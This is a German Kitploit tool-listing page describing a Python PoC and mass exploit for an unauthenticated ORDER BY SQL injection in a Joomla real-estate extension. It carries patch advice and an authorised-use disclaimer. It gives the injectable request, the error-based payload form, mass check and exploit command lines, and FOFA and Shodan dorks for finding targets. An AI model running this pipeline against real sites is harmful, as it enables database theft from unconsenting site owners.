Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-100752 — Python-3-PoC und Massen-Exploit für CVE-2026-100752, eine unauthentifizierte SQL-Injection in OrdaSoft Joomla Real Estate Manager <=6.7.8 über den order_field ORDER BY-Parameter. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-100752
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-100752

CVE-2026-100752

Python-3-PoC und Massen-Exploit für CVE-2026-100752, eine unauthentifizierte SQL-Injection in OrdaSoft Joomla Real Estate Manager <=6.7.8 über den order_field ORDER BY-Parameter.

vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) unauthentifizierte SQL-Injection

Python-3-PoC für CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) Joomla-Erweiterung ≤ 6.7.8. Behoben in 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Kataloghttps://pocbit.org/pocs/
Komponentecom_realestatemanager
Dateisite/realestatemanager.php
Parameterorder_field → ORDER BY (nicht gequotet, keine Allow-List)
AuthKeine (öffentliche Listing- / Such- / Kategorie-Ansichten)
CWECWE-89 SQL Injection
AußerdemLegacy-order_direction-POST-Injection (Metasploit / Audits vor 6.7.9)

PoC-Ausgabe (Screenshot)

Farbiges PoCbit-Banner, gefolgt von --mode exploit-JSON-Ausgabe: exploited: true, Vektor order_field_get, Route showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Beispielbefehl:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Der Screenshot stammt aus einer autorisierten Testumgebung; die Ziel-URL dient der PoC-Verifikation.)


Zusammenfassung der Schwachstelle (Türkçe)

Real Estate Manager (Free) ist eine OrdaSoft-Erweiterung zur Verwaltung von Immobilienanzeigen auf Joomla. In den Versionen 6.7.8 und früher wird der Anforderungsparameter order_field in site/realestatemanager.php direkt in die ORDER BY-Klausel eingefügt; es gibt keine Allow-List für Spaltennamen, kein Escaping und keinen Cast. Ohne Authentifizierung können Kategorie-Navigation, Suchergebnisse und vollständige Anzeigenlisten-Abfragen ausgenutzt werden.

Bei erfolgreicher SQLi sollten Lesen aus der Datenbank (Version, Benutzer-Hashes, Site-Daten), Schreiben/Löschen je nach Berechtigungen und verkettete RCE-Risiken bewertet werden. Führen Sie ein Upgrade auf Version 6.7.9 oder höher durch (OrdaSoft security release).


Technischer Mechanismus

Joomla-Front-Controller:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field steuert die ORDER BY-Spalte/-Ausdruck. Werte wie error-based Subqueries können injiziert werden, da der Wert ohne Bindung oder Validierung in SQL konkateniert wird.

Betroffene Abfragekontexte (gemäß CVE-Text):

  1. Kategorie-Browsing (showCategory und verwandte)
  2. Suchergebnisse
  3. Vollständige Immobilienliste

Dieses PoC:

  • Fingerprint com_realestatemanager (Pfade + optionale Manifest-Version)
  • Scrape catid / Itemid aus dem Site-HTML
  • Probe-Tasks: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Primär: order_field error-based GET und POST
  • Fallback: order_direction=asc,<injection> (historischer Vektor, weiterhin nützlich bei einigen Builds)
  • Check + Mass Check → hits.txt
  • Exploit + Mass Exploit → exploited.txt (Zeilen mit erfolgreichem SELECT-Leak)

Anforderungen

cd CVE-2026-100752
pip install -r requirements.txt

Verwendung

Einzelnes Ziel — Check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive versucht SELECT VERSION(), wenn der Boolean-/Error-Nachweis nicht eindeutig ist.

Einzelnes Ziel — Exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Massenverarbeitung

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagRolle
--mode exploitError-based Datenextraktion (Massenverarbeitung unterstützt)
--subqueryInneres SQL für CONCAT(0x7e, …) Double-Query-Payload
--vectorErzwingt order_field_get, order_field_post oder order_direction_post
-jParallele Ziele
--no-colorEinfaches Terminal

JSONL enthält pocbit, pocbit_catalog, pocbit_page, cve, component.


FOFA / Asset-Discovery-Dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Shodan-Stil (falls unterstützt): http.html:com_realestatemanager

Exportieren Sie Hostnamen in targets.txt (eine URL pro Zeile) und führen Sie dann Check → Hits → Exploit nur auf autorisierten Immobilien durch.


Versionserkennung

Manifest (falls exponiert):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Wenn Version ≤ 6.7.8 → likely_vulnerable_version. Wenn ≥ 6.7.9 → patched_version (Exploit kann dennoch fehlschlagen).


Verwandte CVEs (gleicher Release-Zug)

CVETypBehoben
CVE-2026-100752Unauth SQLi (order_field)6.7.9
CVE-2026-100753Reflected XSS (öffentliche Immobilienansichten)6.7.9

Gleicher Hersteller-Batch (Sep 2026): Vehicle Manager und andere OrdaSoft-Erweiterungen erhielten separate CVEs — patchen Sie alle OrdaSoft-Komponenten, die Sie betreiben.


Referenzen

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (Sep 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (Legacy-order_direction-POST)

Rechtliches

Nur autorisiertes Sicherheitstesting und Patch-Validierung. Nicht gegen Systeme ohne Genehmigung verwenden.


GitHub-Repository-Beschreibung

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Tool herunterladen